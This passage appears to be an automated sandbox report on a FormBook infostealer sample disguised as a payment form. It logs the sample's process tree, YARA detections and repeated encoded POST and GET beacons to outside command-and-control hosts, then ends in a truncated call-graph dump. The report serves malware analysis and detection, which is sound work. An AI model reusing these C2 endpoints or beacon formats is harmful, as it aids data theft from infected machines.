                          Jul 18, 2024 08:18:44.353916883 CEST | 1236 | IN
                          Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                          Jul 18, 2024 08:18:44.353924036 CEST | 1236 | IN
                          Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                          Jul 18, 2024 08:18:44.354181051 CEST | 1236 | IN
                          Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                          Jul 18, 2024 08:18:44.354187012 CEST | 217 | IN
                          Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          25 | 192.168.2.9 | 49735 | 74.208.46.171 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:49.409929991 CEST | 808 | OUT | POST /i1fz/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lavillitadepapa.com
                          Origin: http://www.lavillitadepapa.com
                          Referer: http://www.lavillitadepapa.com/i1fz/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=3/Wb1KmkdWhAZIR2tOkmbSUhRcfTc3afA2aCiZXLW2CRkI2lE1B6/Sb+zAARSP7gTtf8NUnigN9UzzHMkhiP4G/bp7b2k9juO0LiF3GDS0HwOHPP3iZ1Ff3ztoWJwc/ppa70N9HqShBQWF/HC0SUGKeR+RdotivIBzUclZgko3kGN7FdFuyEvulqGmiM
                          Jul 18, 2024 08:18:49.925992012 CEST | 466 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:49 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/
                          Content-Length: 245
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          26 | 192.168.2.9 | 49736 | 74.208.46.171 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:51.948964119 CEST | 832 | OUT | POST /i1fz/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lavillitadepapa.com
                          Origin: http://www.lavillitadepapa.com
                          Referer: http://www.lavillitadepapa.com/i1fz/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=3/Wb1KmkdWhAWIB2vt8mTSUmd8fTTXabA2WCiYiMWjaRkomlD0B64Sb+9gAYfv7pTtTFNVbigNpUz3PMkSaI4W+9kbb4g9juO0LiF2ilS0vwOXTP2DZ2Dv389YWJ68/tpa7dN8bASlxQWFPHClSLIKebwxd88AufBBUn6qAU1l89KalDUc7f65lNBBrkoLGBvLrwgRs9DxrYEfDmmw==
                          Jul 18, 2024 08:18:52.810693026 CEST | 466 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:52 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/
                          Content-Length: 245
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>
                          Jul 18, 2024 08:18:52.810739994 CEST | 466 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:52 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/
                          Content-Length: 245
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          27 | 192.168.2.9 | 49737 | 74.208.46.171 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:54.496222019 CEST | 1845 | OUT | POST /i1fz/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lavillitadepapa.com
                          Origin: http://www.lavillitadepapa.com
                          Referer: http://www.lavillitadepapa.com/i1fz/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:55.043245077 CEST | 466 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:54 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/
                          Content-Length: 245
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          28 | 192.168.2.9 | 49738 | 74.208.46.171 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:57.038337946 CEST | 533 | OUT | GET /i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.lavillitadepapa.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:57.569361925 CEST | 750 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:57 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&amp;54D0m=gvohHHH0">here</a>.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          29 | 192.168.2.9 | 49739 | 154.92.52.196 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:19:02.667402983 CEST | 793 | OUT | POST /gtrt/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.csstoneoak.com
                          Origin: http://www.csstoneoak.com
                          Referer: http://www.csstoneoak.com/gtrt/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:19:03.581211090 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 06:19:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Content-Encoding: gzip


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          30 | 192.168.2.9 | 49740 | 154.92.52.196 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:19:05.208739996 CEST | 817 | OUT | POST /gtrt/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.csstoneoak.com
                          Origin: http://www.csstoneoak.com
                          Referer: http://www.csstoneoak.com/gtrt/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:19:06.130501986 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 06:19:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Content-Encoding: gzip


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          31 | 192.168.2.9 | 49741 | 154.92.52.196 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:19:07.742604971 CEST | 1830 | OUT | POST /gtrt/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.csstoneoak.com
                          Origin: http://www.csstoneoak.com
                          Referer: http://www.csstoneoak.com/gtrt/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:19:08.617599010 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 06:19:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Content-Encoding: gzip


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          32 | 192.168.2.9 | 49742 | 154.92.52.196 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:19:10.273647070 CEST | 528 | OUT | GET /gtrt/?54D0m=gvohHHH0&mZytyNB=CHU0G0yFQmM3m9FspjIn2OXZQ8PvFb3qq8K3IggeoLnhuD5d4WydmEsCdQRuIbszuu3RpEHjTi2Q+otudHtA+7uFI7xmMJNqmwR/uOZtT1hR+XqCuA== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.csstoneoak.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:19:11.204243898 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 06:19:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Data Ascii: 3066<html dir="ltr" lang="zh"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0"> <iframe marginwidth=0 marginheight=0 width="100%" height="100%" src="https://www.etmt194.com/s1/yurjyyya" frameborder="no" ...scrolling="no"-->></iframe> <script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3J3Wx9NA0GlDdn6N",ck:"3J3Wx9NA0GlDdn6N"})</script><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQVKHmW8C3sAGQG0",ck:"KQVKHmW8C3sAGQG0"})</script></html><!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>-()APP</title> <meta name="description" content="()APP [TRUNCATED]


                          Target ID:0
                          Start time:02:15:10
                          Start date:18/07/2024
                          Path:C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe"
                          Imagebase:0x7ff6e8250000
                          File size:1'950'720 bytes
                          MD5 hash:7F8D840982AD0A6C999A3A35E2BFF6C1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:02:15:10
                          Start date:18/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff70f010000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:02:15:11
                          Start date:18/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                          Imagebase:0xcf0000
                          File size:2'625'616 bytes
                          MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:true

                          Target ID:5
                          Start time:02:15:29
                          Start date:18/07/2024
                          Path:C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe"
                          Imagebase:0x6c0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:7
                          Start time:02:15:30
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\findstr.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\findstr.exe"
                          Imagebase:0x8d0000
                          File size:29'696 bytes
                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          Target ID:9
                          Start time:02:15:43
                          Start date:18/07/2024
                          Path:C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe"
                          Imagebase:0x6c0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:10
                          Start time:02:16:00
                          Start date:18/07/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff73feb0000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                            Execution Graph

                            Execution Coverage:6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:25.1%
                            Total number of Nodes:920
                            Total number of Limit Nodes:38
16082->16086 16084 7ff6e825df30 8 API calls 16083->16084 16084->16082 16087 7ff6e8257e3e 16085->16087 16130 7ff6e825e6d0 16085->16130 16086->16085 16138 7ff6e8251df0 16087->16138 16090 7ff6e8257e43 16090->16071 16147 7ff6e8261c50 16090->16147 16093 7ff6e8257e88 16153 7ff6e8261000 16093->16153 16094 7ff6e8257e6f 16095 7ff6e825ce20 2 API calls 16094->16095 16097 7ff6e8257e7b RaiseFailFastException 16095->16097 16097->16093 16100 7ff6e825ce0e 16099->16100 16101 7ff6e825cce0 16099->16101 16100->16072 16157 7ff6e8263ac0 16101->16157 16106 7ff6e825df30 8 API calls 16107 7ff6e825cd12 16106->16107 16108 7ff6e825cd3d GetCurrentProcess GetProcessAffinityMask 16107->16108 16110 7ff6e825cd34 16107->16110 16111 7ff6e825cda8 16107->16111 16108->16110 16109 7ff6e825cd84 QueryInformationJobObject 16109->16111 16110->16109 16111->16072 16112->16074 16114 7ff6e82b0c50 _swprintf_c_l 3 API calls 16113->16114 16115 7ff6e82552f5 16114->16115 16117 7ff6e8255334 16115->16117 16316 7ff6e8260cc0 16115->16316 16117->16076 16118 7ff6e8255302 16118->16117 16319 7ff6e8260ca0 16118->16319 16122 7ff6e8260ca0 InitializeCriticalSectionEx 16121->16122 16123 7ff6e8257d66 16122->16123 16123->16071 16124 7ff6e82536d0 16123->16124 16125 7ff6e82b0c50 _swprintf_c_l 3 API calls 16124->16125 16126 7ff6e82536ee 16125->16126 16127 7ff6e825378a 16126->16127 16321 7ff6e82576b0 16126->16321 16127->16080 16129 7ff6e8253720 16129->16080 16131 7ff6e825e6fb 16130->16131 16137 7ff6e825e7a6 16130->16137 16132 7ff6e82b0c50 _swprintf_c_l 3 API calls 16131->16132 16133 7ff6e825e71a 16132->16133 16134 7ff6e8260ca0 InitializeCriticalSectionEx 16133->16134 16135 7ff6e825e745 16134->16135 16136 7ff6e825e78e GetSystemTimeAsFileTime 16135->16136 16136->16137 16137->16087 16139 7ff6e8251e3c 16138->16139 16142 7ff6e8251e36 16138->16142 16140 7ff6e825df30 8 API calls 16139->16140 16140->16142 16141 7ff6e8251eb3 16141->16090 16142->16141 16326 7ff6e82540f0 16142->16326 16144 7ff6e8251e98 16144->16141 16333 7ff6e825f700 
16144->16333 16145 7ff6e8251ea8 16145->16090 16148 7ff6e8261c99 16147->16148 16152 7ff6e8257e5b 16147->16152 16149 7ff6e8261cef GetEnabledXStateFeatures 16148->16149 16148->16152 16150 7ff6e8261d00 16149->16150 16149->16152 16151 7ff6e8261d46 GetEnabledXStateFeatures 16150->16151 16150->16152 16151->16152 16152->16093 16152->16094 16154 7ff6e826101a _swprintf_c_l 16153->16154 16360 7ff6e825ca50 GetModuleHandleExW 16154->16360 16156 7ff6e8257e8d 16305 7ff6e825d6d0 16157->16305 16159 7ff6e8263ade 16160 7ff6e825d6d0 8 API calls 16159->16160 16161 7ff6e8263b0b 16160->16161 16162 7ff6e825d6d0 8 API calls 16161->16162 16163 7ff6e8263b33 16162->16163 16164 7ff6e825d6d0 8 API calls 16163->16164 16165 7ff6e8263b5b 16164->16165 16166 7ff6e825d6d0 8 API calls 16165->16166 16167 7ff6e8263b88 16166->16167 16168 7ff6e825d6d0 8 API calls 16167->16168 16169 7ff6e8263bb0 16168->16169 16170 7ff6e825d6d0 8 API calls 16169->16170 16171 7ff6e8263bdd 16170->16171 16172 7ff6e825d6d0 8 API calls 16171->16172 16173 7ff6e8263c05 16172->16173 16174 7ff6e825d6d0 8 API calls 16173->16174 16175 7ff6e8263c2d 16174->16175 16176 7ff6e825d6d0 8 API calls 16175->16176 16177 7ff6e8263c55 16176->16177 16178 7ff6e825d6d0 8 API calls 16177->16178 16179 7ff6e8263c82 16178->16179 16180 7ff6e825d6d0 8 API calls 16179->16180 16181 7ff6e8263caf 16180->16181 16182 7ff6e825d7a0 18 API calls 16181->16182 16183 7ff6e8263cd7 16182->16183 16184 7ff6e825d7a0 18 API calls 16183->16184 16185 7ff6e8263d00 16184->16185 16186 7ff6e825d7a0 18 API calls 16185->16186 16187 7ff6e8263d2e 16186->16187 16188 7ff6e825d7a0 18 API calls 16187->16188 16189 7ff6e8263d57 16188->16189 16190 7ff6e825d7a0 18 API calls 16189->16190 16191 7ff6e8263d80 16190->16191 16192 7ff6e825d7a0 18 API calls 16191->16192 16193 7ff6e8263dae 16192->16193 16194 7ff6e825d7a0 18 API calls 16193->16194 16195 7ff6e8263ddc 16194->16195 16196 7ff6e825d7a0 18 API calls 16195->16196 16197 7ff6e8263e05 16196->16197 16198 7ff6e825d7a0 18 API calls 16197->16198 
16199 7ff6e8263e2e 16198->16199 16200 7ff6e825d7a0 18 API calls 16199->16200 16201 7ff6e8263e57 16200->16201 16202 7ff6e825d7a0 18 API calls 16201->16202 16203 7ff6e8263e80 16202->16203 16204 7ff6e825d7a0 18 API calls 16203->16204 16205 7ff6e8263ea9 16204->16205 16206 7ff6e825d7a0 18 API calls 16205->16206 16207 7ff6e8263ed2 16206->16207 16208 7ff6e825d7a0 18 API calls 16207->16208 16209 7ff6e8263f00 16208->16209 16210 7ff6e825d7a0 18 API calls 16209->16210 16211 7ff6e8263f2e 16210->16211 16212 7ff6e825d7a0 18 API calls 16211->16212 16213 7ff6e8263f57 16212->16213 16214 7ff6e825d7a0 18 API calls 16213->16214 16215 7ff6e8263f80 16214->16215 16216 7ff6e825d7a0 18 API calls 16215->16216 16217 7ff6e8263fa9 16216->16217 16218 7ff6e825d7a0 18 API calls 16217->16218 16219 7ff6e8263fd2 16218->16219 16220 7ff6e825d7a0 18 API calls 16219->16220 16221 7ff6e8264000 16220->16221 16222 7ff6e825d7a0 18 API calls 16221->16222 16223 7ff6e826402e 16222->16223 16224 7ff6e825d7a0 18 API calls 16223->16224 16225 7ff6e8264057 16224->16225 16226 7ff6e825d7a0 18 API calls 16225->16226 16227 7ff6e8264080 16226->16227 16228 7ff6e825d7a0 18 API calls 16227->16228 16229 7ff6e82640a9 16228->16229 16230 7ff6e825d7a0 18 API calls 16229->16230 16231 7ff6e82640d2 16230->16231 16232 7ff6e825d7a0 18 API calls 16231->16232 16233 7ff6e82640fb 16232->16233 16234 7ff6e825d7a0 18 API calls 16233->16234 16235 7ff6e8264124 16234->16235 16236 7ff6e825d7a0 18 API calls 16235->16236 16237 7ff6e826414d 16236->16237 16238 7ff6e825d7a0 18 API calls 16237->16238 16239 7ff6e8264176 16238->16239 16240 7ff6e825d7a0 18 API calls 16239->16240 16241 7ff6e826419f 16240->16241 16242 